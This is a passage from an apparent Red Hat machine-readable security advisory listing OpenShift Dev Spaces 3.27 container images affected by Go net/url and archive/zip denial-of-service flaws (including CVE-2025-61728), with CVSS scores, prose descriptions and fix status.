"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
